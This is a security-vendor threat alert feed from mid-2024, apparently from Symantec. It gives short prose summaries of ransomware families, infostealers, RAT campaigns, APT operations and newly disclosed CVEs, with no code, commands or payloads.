ALERTS


HOME  APT  BOTNET  CAMPAIGN  CRIME  CRYPTOCURRENCY  EXPLOIT  HACKING  GROUP  OPERATION  PHISHING  RANSOM  SPAM  VIRUS  VULNEREBILITY  | March(16) April(92) May(99) June(64)


DATE

NAME

CATEGORY

SUBCATE

INFO

19.6.24AzzaSec RansomwareALERTSRANSOMAzzaSec is another run-of-the-mill ransomware variant found being distributed in the wild. The malware encrypts user files and appends .AzzaSec extension to them. The attackers behind this variant leave a ransom note demanding payment in Bitcoin for the file decryption.  
19.6.24New strain of Diamorphine Linux rootkitALERTSVIRUSA new variant of an open-source LKM (Loadable Kernel Module) rootkit dubbed Diamorphine has been found in the wild. The rootkit is used by threat actors to hide malicious processes or elevate privileges on the compromised machines. Diamorphine leverages magic packets allowing it to run arbitrary commands on the infected endpoint. This latest variant has also new exit function that allows for unloading the rootkit kernel module from memory. 
19.6.24Malvertising Campaign Targets Users With Fake Software InstallersALERTSVIRUSA malvertising campaign has been observed, enticing users to download masqueraded installers disguised as popular software such as Google Chrome and Microsoft Teams. Users are directed to typo-squatted websites after searching for these software titles on search engines. These installers are designed to deploy a backdoor known as Oyster, also referred to as Broomstick. Oyster facilitates gathering information about the compromised system, manages communication with command-and-control (C2) servers, and enables remote code execution.
19.6.24Hijack Loader and Vidar Stealer targeting Cisco Webex usersALERTSVIRUSMalware campaigns affecting users in Latin America and the Asia Pacific regions have recently been reported. These campaigns target users of popular commercial software such as the Cisco Webex Meetings App, enticing them to download password-protected archive files containing trojanized software copies. Upon extraction and execution, a stealthy malware loader named Hijack Loader is activated. Hijack Loader then acts as a gateway to deploy Vidar Stealer using an AutoIt script. Vidar Stealer is designed to gather credentials and sensitive data, which it exfiltrates to the attacker's command-and-control (C2) servers. Additionally, the stealer can download payloads such as Amadey Loader, used to initiate the XMRig miner, and a clipper malware that redirects cryptocurrency transactions to wallets controlled by the attackers.
19.6.24Rogue Raticate Malspam Campaign: Malicious PDFs Lead to NetSupport RATALERTSVIRUSThe cybercriminal group known as Rogue Raticate (aka RATicate) has been active for a few years now and is well-known for targeting enterprises using malicious emails and remote access trojans. This week another one of their campaigns was observed. Attached to the malicious emails is a PDF file (e.g., unpaid-7985652547.pdf, Paper-2445311685.pdf) containing a malicious URL. The attackers are using two social engineering templates as lures – OneDrive and Adobe. If a user is successfully tricked into clicking on the URL, they will be led via a Traffic Distribution System (TDS) into the rest of the chain and in the end, have the NetSupport Remote Access Tool deployed on their machine.
18.6.24Vortax: MacOS Malware Campaign UnveiledALERTSVIRUSA recent malware campaign targeting macOS vulnerabilities to distribute infostealers has surfaced. The threat actor, identified as markopolo, is actively aiming at cryptocurrency users. They utilize a compromised binary of a virtual meeting software called Vortax, which, once downloaded and installed, leads to the deployment of infostealers such as Rhadamanthys, Stealc, and Atomic macOS Stealer.
18.6.24Cryptojacking campaign exploiting Docker engine vulnerabilitiesALERTSCRYPTOCURRENCYA new cryptojacking campaign targeting publicly exposed Docker Engine hosts has been observed. It is presumed to be associated with the threat actors behind the previously seen malware campaign dubbed Spinning YARN. The attack vector starts by scanning for open port 2375 and deploying an Alpine Linux container.
18.6.24Rapax Ransomware ALERTSRANSOMRapax is a ransomware whose binaries have recently been submitted to a public malware analysis and detection platform. The ransom note found on compromised machines (instruction.txt) reveals that the author focuses solely on encrypting files rather than employing exfiltration and double-extortion tactics, demanding a ransom of 5,000 US dollars in Bitcoin for decryption.
17.6.24Limpopo ransomware targets ESXi serversALERTSRANSOMLimpopo is new ransomware variant targeting the vulnerable ESXi servers, as reported by Fortinet. This malware variant is believed to be based on the leaked Babuk ransomware source code and related to other ransomware strains such as Socotra and Formosa. Limpopo has been observed to be distributed in campaigns affecting Latin America and Thailand. The ransomware encrypts user files and appends .Limpopo extension to them.
17.6.24CVE-2024-28995 - SolarWinds Serv-U Directory Traversal vulnerabilityALERTSVULNEREBILITYCVE-2024-28995 is a recently disclosed Directory Traversal vulnerability affecting Serv-U managed file transfer (MFT) server solution. If successfully exploited the flaw could allow attackers with read access to sensitive information on the vulnerable host machine. While there have been no reports of in-the-wild exploitation, the vendor has already addressed the reported vulnerability in the product version 15.4.2 Hotfix 2.
17.6.24Brain Cipher RansomwareALERTSRANSOMRansomware actors continue to sprout from left and right, and in this protection bulletin, we'll briefly discuss one which uses a Lockbit variant having recently emerged in the threat landscape. Dubbing themselves 'Brain Cipher Ransomware' per their ransom note ([randomID].README.txt), this group appear to perform double extortion - exfiltrating sensitive data and encrypting it. Victims are provided with an encryption ID to use on the group's Onion website to get in touch.
17.6.24Chaos ransomware actors pose as Lockbit to add pressureALERTSRANSOMSymantec has recently observed a Chaos ransomware actor making the rounds - encrypting single machines and claiming to be 'Lockbit' in dropped ransom notes (readme.txt). In this case, they are demanding $180 USD worth of Bitcoin be paid to a specified crypto wallet.
17.6.24DISGOMOJI: Discord-based malware campaign targeting government organizationsALERTSVIRUSA new innovative malware campaign has emerged, utilizing Discord for Command and Control (C2) operations and employing an emoji-based protocol where the threat actor communicates commands to the malware through emojis in the command channel. Dubbed DISGOMOJI, the malware is a UPX-packed ELF2 written in Golang. It contains hardcoded authentication tokens and server IDs within the ELF, enabling access to the Discord server.
14.6.24OPIX RansomwareALERTSRANSOMOPIX is a newly discovered ransomware variant typically spread through social engineering tactics such as phishing emails and drive-by downloads. The malware modifies user files by encrypting them with a random character string and appending a ".OPIX" extension. For example, a file called "test.txt" becomes something like "B532D3Q9.OPIX". Victims will find a ransom note dropped by the ransomware, usually named "#OPIX-Help.txt", instructing them to contact the attackers via provided email or Telegram handle within 48 hours, or their stolen data will be sold to competitors and published on the dark web.
14.6.24Malspam Campaign Delivering Koi Loader/Koi StealerALERTSVIRUSIn a recent malspam campaign attackers appear to have altered their tactics in order to avoid detection. Instead of the typical approach of sending direct emails with malicious links, in this case they began with benign emails discussing a random scenario. If the recipient responds back and engages, the attackers will follow up and send a malicious link. Clicking on it will lead to a webpage where a ZIP file containing a Windows shortcut file (LNK) will be downloaded. This shortcut will subsequently load Koi Loader or Koi Stealer payload, capable of stealing sensitive data such as cookies, history, and login information.
14.6.24El Dorado Ransomware: Increased AttacksALERTSRANSOMEl Dorado is a double-extortion ransomware actor who has recently claimed multiple victims on their website. Once they gain access to a company, they search for machines with valuable data to exfiltrate and encrypt, appending .00000001 to encrypted files. Copies of their ransom note (HOW_RETURN_YOUR_DATA.TXT) are placed in various folders. In their ransom note, they claim to have been "white hat" but turned to crime due to poor pay. They also inform victims about how to contact them through the TOR network and using live chat on their website, threatening to sell or leak the exfiltrated data if the victims do not connect within 7 days and pay a ransom. Additionally, they further pressure victims with threats of continuous attacks against their companies, partners, and customers.
14.6.24Operation Celestial ForceALERTSOPERATIONA new malicious campaign dubbed 'Operation Celestial Force' has been reported by the researchers from Cisco Talos. The campaign has been active since at least 2018 and targeting Indian organizations from the defense, government and technology sectors. According to the published research, 'Operation Celestial Force' has been attributed to the threat group known as Cosmic Leopard. The attackers have been leveraging Android malware variant - GravityRAT as well as Electron-based Windows loader called HeavyLift. The attacks carried out by this APT group have been managed by a standalone custom tool called GravityAdmin, that centralizes execution of malicious actions on the compromised systems.
14.6.24ALERTSVULNEREBILITYAs part of June's patch Tuesday, Microsoft has patched a critical (CVSS score 9.8) Message Queuing (MSMQ) vulnerability CVE-2024-30080. By sending specially crafted malicious MSMQ packets to the vulnerable servers and thus exploiting the vulnerability, the attackers might achieve remote code execution and take over the unpatched server. The reported flaw affects various Windows operating systems starting from Windows Server 2008 and Windows 10.
14.6.24CVE-2024-4701 - Netflix Genie job orchestration engine vulnerabilityALERTSVULNEREBILITYCVE-2024-4701 is a recently disclosed critical (CVSS score 9.9) path traversal vulnerability affecting Netflix' Genie job orchestration engine for big data applications. If successfully exploited the vulnerability might allow remote attackers arbitrary code execution within the vulnerable applications as well as sensitive information exposure. The vulnerability has been already patched in Genie OSS version 4.3.18.
14.6.24CVE-2024-2194 - WP Statistics Plugin XSS vulnerabilityALERTSVULNEREBILITYCVE-2024-2194 is a recently disclosed stored cross-site scripting vulnerability affecting WP Statistics plugin for WordPress in versions up to 14.5. If successfully exploited the vulnerability might allow unauthenticated attackers to inject arbitrary web scripts in pages. Those arbitrary scripts are then executed whenever a user accesses an injected page. The vulnerability has been reported as being actively exploited in the wild.
13.6.24Noodle RAT malware supports both Windows and Linux deploymentsALERTSVIRUSNoodle RAT is a malware variant recently identified by researchers from Trend Micro. This RAT has been reported as being used in targeted campaigns in the Asia-Pacific region. Noodle RAT is a modular malware with relatively straightforward capabilities and displays several code overlaps with Gh0st RAT and Rekoobe malware families. It allows the attackers to download/upload arbitrary files, in-memory modules execution as well as TCP proxying. The threat actors behind Noodle RAT have also been leveraging MultiDrop and MicroLoad malwares prior to final payload deployment. Next to the Windows variant of this malware, a Linux strain has also been identified. It features capabilities to download/upload arbitrary files, reverse shell execution as well as SOCKS tunneling.
13.6.24Adwind (aka jRAT) distributed in recent campaigns targeting users in Italy ALERTSVIRUSAdwind malware (also known as jRAT or njRAT) has been observed in recent campaigns targeting users in Italy. The attack chain includes malspam emails containing .zip attachments. Upon extraction the user is served with .HTML files such as INVOICE.html or DOCUMENT.html that lead to malicious .jar files. The final dropped payload is Adwind Remote Access Trojan (RAT) that allows the attackers control over the compromised endpoint as well as confidential data collection and exfiltration. 
13.6.24WarmCookie backdoorALERTSVIRUSWarmCookie is a new backdoor variant distributed in phishing campaigns advertising fake job offers. The attack chain leverages malicious JS scripts executing PowerShell commands that in turn lead to the download of WarmCookie DLL payloads. The attackers abuse the Background Intelligent Transfer Service (BITS) to download the malicious payloads. WarmCookie backdoor has extensive capabilities including endpoint fingerprinting, screenshot capture, arbitrary commands execution, file content read/exfiltration and deployment of additional payloads, among others.
13.6.24Black Basta attackers leveraging CVE-2024-26169 vulnerability as a Zero-dayALERTSVIRUSIn a newly released report, Symantec’s Threat Hunter Team reviewed evidence that suggests that attackers linked to Black Basta ransomware compiled CVE-2024-26169 exploit prior to patching. The vulnerability CVE-2024-26169 is a Windows Error Reporting Service exploit that can permit an attacker to elevate their privileges. Analysis indicates that an exploit tool deployed in recent attacks linked to Black Basta has been exploiting this vulnerability as a zero-day.
13.6.24Malware campaign unveils new ValleyRAT variantALERTSVIRUSA malware campaign has been observed delivering a newer version of ValleyRAT as the final payload. The attack vector involves a downloader with an injected shellcode that dynamically resolves APIs and establishes a connection with the C2 server to download the next stage malware. This provides remote attackers with unauthorized access and control over infected machines. The new variant of ValleyRAT is equipped with capabilities such as capturing screenshots, process filtering, forced shutdowns, and clearing Windows event logs.
12.6.24Remcos RAT delivered via UUEncoding (UUE) FileALERTSVIRUSA recent phishing campaign spreading Remcos RAT employs themed documents related to shipping or quotations. The attack commences with a UUE-encoded VBS script, leading to the another obfuscated VBS script upon decoding. This script facilitates the saving and execution of a PowerShell script, which in turn connects to a link to download an additional obfuscated PowerShell script. The purpose of this obfuscation chain is to evade detection.
12.6.24Protection Highlight: Phishers Ramp Up Exploitation of Telegram Bot APIALERTSPHISHINGOver the past few months, more and more phishing actors via malicious HTML have been following in the footsteps of Infostealers and RATs, and are now also abusing the Telegram Bot API to harvest users' credentials and other sensitive information such as credit cards details. Activities are being observed worldwide and these can cause significant financial losses, operational disruptions, and reputational damage for enterprises. Attackers use stolen credentials for account takeovers, identity / financial theft, and additional attacks, often selling stolen data on the dark web.
12.6.24TellYouThePass ransomware exploiting CVE-2024-4577 Argument Injection Vulnerability in PHPALERTSVULNEREBILITYCVE-2024-4577 - is a high-severity (CVSS: 9.8) argument injection vulnerability in PHP, which is a popular scripting tool. This vulnerability affects PHP when it runs in CGI mode. A successful exploitation of this vulnerability could allow an unauthenticated attacker to execute arbitrary code on the vulnerable PHP server, leading to complete system compromise and deliver malware including ransomware.
12.6.24Fog RansomwareALERTSRANSOMA new ransomware variant dubbed Fog has been recently distributed in the wild. The attackers behind this malware have been leveraging compromised VPN credentials to attack vulnerable networks of US organizations from the education and recreation sector.
12.6.24AZStealer - a Python-based infostealerALERTSVIRUSAZStealer is a recently discovered Python-based infostealer variant. It has the functionality to steal a wide variety of information from the compromised endpoints including: data stored in browsers (cookies, history, bookmarks, passwords, saved credit card info and autofill data), Discord tokens, login sessions from miscellaneous applications including Steam, Uplay, Tiktok, Telegram, Twitch, Spotify, Reddit or Roblox.
12.6.24Fireant APT targets Vietnamese entities with LNK file malware campaignALERTSAPTA malware campaign conducted by the Fireant (also known as Mustang Panda) APT group using Windows shortcut (LNK) files has been reported. The threat actor targets Vietnamese entities with lures related to the education sector and tax compliance. The attack vector involves phishing emails with archive (zip, rar) attachments containing malicious LNK files. The final payload is believed to be the PlugX RAT, which helps the attackers to remotely execute various commands on the compromised system.
12.6.24Beware of malicious Python packages on PyPI repositoryALERTSVIRUSNumerous malicious Python packages have been observed on the Python Package Index (PyPI) repository, aimed at exploiting typosquatting to target users of legitimate packages. For instance one such package, 'crytic-compilers', masquerades as the legitimate library 'crytic-compile' and is designed to distribute the Lumma stealer. Similarly, another malicious PyPI package, 'pytoileur', is capable of downloading and installing trojanized Windows binaries for purposes such as surveillance, persistence, and crypto theft.
12.6.24DERO cryptojacking operation targeting Kubernetes infrastructure CRYPTOCURRENCYDero, a cryptocurrency, offers better privacy, anonymity and faster rewards than Monero, and is often used in cryptojacking according to a March 2023 report. A recent report from a threat researcher discussed the cryptojacking campaign's evolution, where the attack vector involves exploiting an externally accessible Kubernetes API server with anonymous authentication enabled. After gaining access, the attacker deployed cryptominer workloads across various Kubernetes namespaces using benign names to evade detection.
11.6.24SSLoader malware using PhantomLoaderALERTSVIRUSSSLoader malware uses PhantomLoader (an effective tool for deploying malware) to enhance its elusive and stealthy behavior. This malware infiltrates via phishing mail campaigns, performs reconnaissance while evading detection, and exfiltrates data back to threat actors while delivering payloads through various techniques. 
11.6.24Yet another JScript RAT spreads via phishing campaignALERTSVIRUSIt is generally known that JScript-based RATs are often spread via phishing campaigns, and a recent attack was spotted using the same technique as former runs where an initial loader script connects to a C&C server triggering the transmission of a new malicious script, known as the second stage loader. This loader then fetches a JScript RAT component from the server, enabling persistent operation and execution of commands received from the server.
11.6.24Abusing Google Ads to distribute backdoor malware masquerading as Advanced IP ScannerALERTSVIRUSA malicious backdoor malware, masquerading as an Advanced IP Scanner, has been observed in the wild. Advanced IP Scanner is a free network scanner for Windows, primarily used by IT administrators to analyze local area networks (LANs) and gather information about connected devices. However, over the past year, this tool has become the target of a watering hole attack. Threat actors have been mimicking the legitimate website and abusing Google Ads to ensure their malicious site ranks highly in search results. As part of the attack vector, the masqueraded installer is used to deploy and load a CobaltStrike beacon.
11.6.24New Grandoreiro banking trojan campaign masquerading as government entities through spear-phishingALERTSVIRUSA new campaign involving the Grandoreiro banking trojan has been observed in the wild. The threat actors are leveraging spear-phishing emails masquerading as correspondence from government entities to lure recipients into downloading ZIP files infected with malware. Grandoreiro is a highly sophisticated and adaptive Windows-based banking trojan first observed in 2016. It has the capability to hijack browser sessions, discover email accounts, steal credentials from web browsers, collect operating system and installed software details, and exfiltrate the collected data to its C2 server.
11.6.24Agent Tesla sending malicious XLA filesALERTSVIRUSAgent Tesla, an infostealing .Net based RAT, has recently been observed sending Spanish language malspam with attached XLA files. These files are crafted to take advantage of multiple old vulnerabilities in Office documents (CVE-2017-11882 and CVE-2017-0199) which causes Excel to automatically download and open remotely stored malicious RTF and JS files, which eventually leads to an Agent Tesla infection.
10.6.24Fake 'KMSPico Activator Tool' Utilized to Deliver Vidar InfoStealerALERTSGROUPResearchers recently identified another drive-by download campaign, wherein users are deceived into downloading a malware-laden application named 'KMSPico activator tool.' This tool, is marketed as a "universal activator" for Windows, but no longer maintained. The attack exploited Java dependencies and a malicious AutoIt script to disable Windows Defender, ultimately decrypting the Vidar payload through shellcode. Vidar's primary function is to steal sensitive user data from browsers and digital wallets. However, this infostealer can also serve as a downloader for ransomware.
8.6.24Sticky Werewolf APTALERTSAPTSticky Werewolf is a threat group initially discovered over a year ago. The attackers have been known to target various organizations, most recently the pharmaceutical and aviation sectors. In their attacks the threat actors leverage malicious .lnk files disguised as .docx documents, decoy .pdf files, malicious Batch and AutoIT scripts, among others. The final payloads distributed in campaigns by Sticky Werewolf include various RAT variants and infostealers. Some examples of malware families spread in previous attacks are Rhadamanthys Stealer, Ozone RAT, MetaStealer, DarkTrack and NetWire.
8.6.24Seidr StealerALERTSVIRUSSeidr is another recent infostealer variant found in the wild and sold via illicit marketplaces. The malware is C++ based with modular architecture. Functionality-wise Seidr steals various information from the compromised endpoints including, OS-related information, data collected from system browsers via keylogging, cryptocurrency wallets etc. Seidr leverages Telegram for data exfiltration and command and control (C2) purposes.
8.6.24DORRA RansomwareALERTSRANSOMDORRA is a recently found ransomware variant from the Makop malware family. The malware encrypts user files, appending the ".DORRA" extension, a unique ID and the developer's email address to them. The ransomware drops a ransom note as a text file called "README-WARNING.txt" where the victims are asked to contact the attackers via provided email for further instructions regarding the data decryption.
8.6.24Apache RocketMQ targeted in Muhstik botnet campaignALERTSBOTNETA recent campaign targeting Apache RocketMQ platforms, exploiting a known vulnerability (CVE-2023-33246) for remote code execution, has been observed. As part of the campaign, threat actors are deploying the Muhstik botnet, known for denial-of-service (DDoS) attacks. Muhstik provides persistence, evades detection, performs lateral movement, and communicates through an IRC command-and-control server. The malware can be used for cryptocurrency mining and launching distributed denial-of-service attacks.
8.6.24Enhanced version of Vidar Stealer emergesALERTSVIRUSAn updated version of the Vidar Stealer has been observed in the wild. This customizable malware is being sold on the dark web and Telegram channels as malware-as-a-service, leveraging social media platforms as part of its command-and-control infrastructure, and collaborating with other malware strains such as STOP/Djvu ransomware and SmokeLoader backdoor. Developed in C++, the malware targets compromised victims' personal information, web browser data, cryptocurrency wallets, financial information, communication applications, and more. It evades detection and exfiltrates sensitive data from compromised systems to its C2 servers.
8.6.24CashRansomware - a new arrival to the threat landscapeALERTSRANSOMCashRansomware (aka CashCrypt) is a newly identified Ransomware‑as‑a‑Service (RaaS) variant. As reported by researchers from Tehtris, the malware appears to be still in active development. CashRansomware is C#-based malware that leverages time‑stomping techniques to detect its execution within a sandbox or a virtualized environment. The malware has the capability to communicate with the attackers by leveraging the Telegram APIs. CashRansomware encrypts user files and appends '.CashRansomware' extension to them. The malware has also functionality to delete system restore points from the infected endpoint.
8.6.24UNC1151 APT targets the Ukrainian Ministry of Defence with malicious Excel campaignALERTSAPTThe UNC1151 APT group has been observed conducting a malware campaign utilizing a malicious Excel document. This group is known for targeting Eastern European countries. In the recent campaign, UNC1151 has been observed targeting the Ukrainian Ministry of Defence, utilizing a malicious Excel document as a lure. Upon execution of the Excel document, which contains an embedded VBA Macro, it drops an LNK and a DLL loader file. Subsequently, running the LNK file initiates the DLL loader, potentially leading to a suspected final payload including AgentTesla, Cobalt Strike beacons, and njRAT.

6.6.24

CVE-2024-32113 - Path Traversal vulnerability in Apache OFBizALERTSVULNEREBILITYCVE-2024-32113 is a recently disclosed path traversal vulnerability affecting Apache OFBiz, which is an open source enterprise resource planning (ERP) system. If successfully exploited the vulnerability might lead to remote code execution in the context of the affected service account. The vulnerability has been patched in Apache OFBiz product version 18.12.13 or above.

6.6.24

Rising trend of exploiting Packer apps in targeted attacksALERTSVIRUSAn increasing trend of abusing Packer apps as a technique to deploy malware payloads has been observed in the wild. Numerous known malware families, primarily related to RATs and stealers, have been exploiting commercial Packer apps, targeting financial institutions and government organizations. BoxedApp packer is one such utility that offers features like virtual storage, virtual processes, and a virtual registry, making it harder for endpoint protection systems to detect or analyze malware.

6.6.24

The rise of Kiteshield packer in the ever-evolving landscape of Linux malwareALERTSVIRUSThreat actors are constantly seeking out new tactics and platforms to evade detection and carry out their espionage activities. Most recently, an increasing trend in targeting the Linux platform has been observed, resulting in a surge of Linux malware. Threat actors are leveraging the Kiteshield packer to evade detection on Linux platforms.

6.6.24

CoinMiner's Proxy Server Suffers Unlucky Ransomware AttackALERTSRANSOMReports have described what seems to be an accidental cyber threat activity where a CoinMiner's proxy server was exposed to the Internet and became the target of a ransomware threat actor's RDP scan attack. This kind of practice, if it becomes more common, may complicate threat analysis as it blurs the lines between different attack groups and their intentions.

6.6.24

SenSayQ: Emerging Ransomware GroupALERTSRANSOMSenSayQ is an emerging ransomware actor who has recently been observed in the threat landscape. At this time, their modus operandi remains shrouded, but they employ double-extortion tactics, exfiltrating data from companies' environments and encrypting their files. This group uses a Lockbit variant to conduct encryption and it drops ransom notes in most folders ([randomID].README.txt) whose content starts with "---Welcome! Your are locked by SenSayQ!---". Similar to other ransomware actors, victims are pressured to make contact within 72 hours or else their stolen data will be published on the attacker’s website.

6.6.24

New Linux variant of the TargetCompany ransomwareALERTSRANSOMA new Linux variant belonging to the TargetRansomware (aka Mallox) malware family has been found in the wild. As called out in the recent report published by Trend Micro, the threat group leveraging this latest Linux variant is actively conducting attacks against ESXi environments. The attackers are also using a custom shell script for the purpose of payload delivery and victim's information exfiltration. The malware encrypts user data and appends .locked extension to the encrypted files. Upon completed encryption a ransom note in form of a text file called "HOW TO DECRYPT.txt" is dropped onto the victim's machine.

6.6.24

Updated Cuckoo malware variant spotted in the wildALERTSVIRUSCuckoo is an infostealing macOS malware initially discovered earlier this year. A new variant of it has just recently been observed in the wild. This variant has been distributed via a fake Homebrew macOS package manager website. The malware has the usual infostealing features allowing it to steal confidential information, credentials, browser cookies, cryptocurrency wallets and exfiltrate the collected data to C2 servers controlled by the attackers. The new Cuckoo variant has also added some VM environment detection capabilities.

6.6.24

RansomHub RansomwareALERTSRANSOMIn a newly released report, Symantec’s Threat Hunter Team provide an analysis of the highly active RansomHub ransomware and its similarity to the now defunct Knight ransomware. Analysis indicates that the developers of RansomHub are different from those that developed Knight, but based on a significant overlap of code, it's assumed the RansomHub developers likely purchased Knight source code which was offered for sale in early 2024. As with others, RansomHub attacks involve vulnerability exploitation and dual-use tools to aid in distribution.

6.6.24

DarkCrystal RAT Delivered via Signal MessengerALERTSVIRUSThe messaging application 'Signal' is famous among the military and is currently being exploited to deliver DarkCrystal RAT malware to government officials, military personnel, and representatives of defense enterprises in Ukraine. The infection chain begins when the victim receives a message with an archive, password, and instructions to open it. Inside the archive is an executable file (".pif" or ".exe"), which is a RARSFX archive containing a VBE file, a BAT file, and an EXE file. Running these files infects the computer with DarkCrystal RAT malware, granting attackers unauthorized access.

6.6.24

Cobalt Strike campaign targets Ukraine using malicious Excel filesALERTSCAMPAIGNA new campaign targeting Ukraine with Cobalt Strike payloads has been observed by researchers from Fortinet. The attackers leverage a multi-staged approach while delivering Excel files containing malicious VBA macros, as well as DLL downloaders and injectors in later attack stages. The Cobalt Strike payloads allow the attackers to establish communication with command and control (C2) servers and execute arbitrary commands.

6.6.24

Android Spyware Targets Brazilian Mobile Users in Nubank MasqueradeALERTSVIRUSNubank, a leading digital bank in Latin America known for its no-fee credit card and mobile banking services, has been one of the latest financial companies to have its brand abused in social engineering schemes aimed at luring mobile users in Brazil. An actor has fabricated malicious Android applications (Nubank.apk) to appear related to Nubank. These applications are likely being distributed via malicious SMS or other social platforms. If a user is successfully lured and installs the fake Nubank app on their mobile device, they will end up with a well-known remote access trojan known as SpyNote.

6.6.24

CVE-2024-24919 - Check Point Security Gateway Information Disclosure VulnerabilityALERTSVULNEREBILITYCVE-2024-24919 is an information disclosure vulnerability in Check Point Security Gateway. Check Point Security Gateway is an integrated software solution that connects corporate networks, branch offices, and business partners via a secure channel. Successful exploitation of this vulnerability may allow an attacker to access certain information on internet-connected Gateways, which have been configured with IPSec VPN, remote access VPN, or mobile access software blade. Symantec's network protection technology, Intrusion Prevention System (IPS), blocks these vulnerability exploitation attempts to prevent further infection/damage to the system.

6.6.24

CVE-2024–27348 - Remote Code Execution vulnerability in Apache HugeGraph ServerALERTSVULNEREBILITYRecently, a critical remote code execution (RCE) vulnerability has been discovered in Apache HugeGraph-Server, identified as CVE-2024-27348 (CVSS: 9.8). Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. The vulnerability affects versions 1.0.0 to 1.3.0 in Java8 and Java11. This vulnerability allows an attacker to execute arbitrary commands on the server.  If successfully exploited, the impact of this vulnerability can be severe, as it can allow unauthorized access to attackers to gain full control over the server, data manipulation, and potential compromise of the entire system. Symantec's network protection technology, Intrusion Prevention System (IPS) blocks these vulnerability exploitation attempts to prevent further infection/damage to the system.

6.6.24

Underground Ransomware Remains ActiveALERTSRANSOMOver the past year the Ransomware actor known as "Underground" has been less active than other groups, yet they remain in the threat landscape and continue to target industries of various size. They are known to generate a lengthy ransom note (!!READ_ME!!.txt) with detailed information that has been exfiltrated. Victims are provided with an ID and a password that allow them to connect with the ransomware group through a website on the TOR network. 

6.6.24

Botnet malware campaign distributing NiceRAT malwareALERTSVIRUSA botnet malware campaign has been reported distributing the NiceRAT malware, disguising itself as Windows or Office genuine authentication tools or free game servers, through domestic file-sharing sites or blogs. NiceRAT is a Python-based open-source program with anti-debugging and anti-virtual machine capabilities. It collects system information, browser information, and cryptocurrency data from compromised systems and exfiltrates the collected data to threat actors' Discord channel, used as a Command and Control (C&C) server.

6.6.24

LummaC2 Infostealer Delivered via a Recent ClearFake CampaignALERTSVIRUSClearFake, a JavaScript framework, utilizes both drive-by-downloads and social engineering tactics, often in fake "browser update" campaigns. Recently, researchers uncovered a new strategy by ClearFake, where users are deceived into manually executing malicious code in PowerShell. This differs from previous tactics where users were typically lured into unwittingly downloading a malicious payload. The change aims to evade security measures and eventually install LummaC2 infostealer malware.

6.6.24

Brazilian banking trojan CarnavalHeistALERTSVIRUSA recent campaign has seen Brazilian users being targeted by a banking Trojan dubbed CarnavalHeist. The infection chain begins with a financial themed mail through which the recipient is lured into downloading an invoice (named as "Nota Fiscal" which is Portuguese for invoice). The actual download is a malicious LNK file which leads to further downloads and executions of script components which are responsible for delivering the final malicious payload. Details regarding the campaign and suspected attacker information were made available in a newly published report by Cisco Talos.

6.6.24

RedTail cryptomining malware exploiting PAN-OS vulnerabilityALERTSCRYPTOCURRENCYRedTail cryptocurrency mining malware has added PAN-OS vulnerability to its exploit arsenal. PAN-OS CVE-2024-3400 is a now patched vulnerability that allows an attacker to execute an arbitrary code file with root user privileges. Exploiting this PAN-OS vulnerability and executing the commands successfully can lead to the downloading of the RedTail payload. This malware employs advanced evasion and persistence techniques. RedTail has also used other propagation mechanisms involving other vulnerability exploits (such as CVE-2023-46805 and CVE-2024-21887).

31.5.24

Malicious activity by LilacSquid threat groupALERTSGROUPA recently disclosed infostealing campaign attributed to the threat group known as LilacSquid has been active since at least 2021. As reported by Cisco Talos, the attackers have been targeting vulnerable public-facing servers and leveraging compromised RDP credentials to deploy a wide range of tools and malware in their attacks. LilacSquid has been observed to use an open-source remote management tool MeshAgent, customized variant of the QuasarRAT malware dubbed PurpleInk and other malware loaders such as InkBox or InkLoader. The deployed PurpleInk payload allows the attackers to collect various information from the compromised endpoint, enumerate, read or delete files, execute remote shells and forward data to C2 servers controlled by the attackers, among others.

31.5.24

Unveiling cryptocurrency mining tactic of the 8220 GangALERTSCRYPTOCURRENCYThe 8220 Gang, a widely recognized threat actor based in China and driven by financial motives, has been active since 2017. Specializing in deploying cryptocurrency-mining malware, they primarily target cloud-based environments and Linux servers, exploiting known application vulnerabilities as part of their tactics, techniques, and procedures (TTPs).

31.5.24

SmallTiger malware campaign reported targeting Korean companiesALERTSCAMPAIGNA malware campaign distributing SmallTiger malware has been reported targeting Korean companies in the defence, automobile parts, and semiconductor manufacturing sectors. This malware acts as a downloader, connecting to the attackers' C&C server to fetch and execute the final payload in memory. As part of the attack chain, the attackers install Mimikatz and ProcDump on the compromised systems. The ProcDump tool is used to dump the memory of the LSASS process, thereby stealing credentials from the infected systems. Additionally, a command-line tool is utilised to extract and display account information and web browser history.

30.5.24

BitRAT and Lumma Stealer spread as fake browser updatesALERTSVIRUSA new campaign delivering BitRAT and Lumma Stealer malware has been observed in the wild. The malware is spread via fake browser updates. The attack chain is initiated by users visiting compromised websites and triggering malicious Javascript code redirecting them to fake update websites. Further down the chain, malicious PowerShell scripts lead to the retrieval of malware loaders and final payload execution. The attackers can leverage the delivered payloads to gain control over the compromised endpoints, remote command execution, and infostealing purposes.

30.5.24

Metamorfo Banking TrojanALERTSVIRUSMetamorfo is a banking Trojan malware (aka Casbaneiro) that is spread through malspam campaigns luring users to click on HTML attachments. The HTML attachment contains malicious code that kicks off processes with the main focus on exfiltrating victims’ financial information including banking credentials.

30.5.24

Datebug updating toolkits with Golang to be cross-platformALERTSAPTAPT group Datebug, in operation since 2013, has been observed updating their toolkit with a new data exfiltration tool written in Golang created with the goal of targeting APAC governments and defense sectors. The group utilizes phishing emails to lure recipients into opening an attached or linked malicious ZIP or ISO file which leads to the data exfiltration tool being installed.

30.5.24

NSIS-based packer usage observed in many common malware families ALERTSVIRUSThe Nullsoft Scriptable Install System (NSIS) is a commonly seen open source software used by cybercriminals for generating malware. This system is used to generate self-extracting custom installers which have been observed delivering many different malware families. In a recent report by Check Point Research, they have provided details on a group of packers using this system.

30.5.24

CatDDoS: A rising threat across multiple sectorsALERTSBOTNETA rise in activity involving a Mirai distributed denial-of-service (DDoS) botnet variant called CatDDoS has been observed. Multiple threat actors are employing various CatDDoS variants to target organizations across multiple sectors, including cloud vendors, communication providers, scientific and research entities, and educational institutions. The vulnerabilities exploited under CatDDoS affect numerous products and technologies, such as Jenkins servers, Apache ActiveMQ servers, Apache Log4j, Cisco Linksys, and NetGear routers, among others.

30.5.24

Mexican Telecom Continuously Impersonated by SpyNote ActorALERTSVIRUSSince at least October 2023, a SpyNote actor has been abusing the brand of a well-known and prominent telecommunications company in Mexico that operates extensively across Latin America and the Caribbean, serving millions of customers in countries such as Argentina, Brazil, Chile, Colombia, and many more.

30.5.24

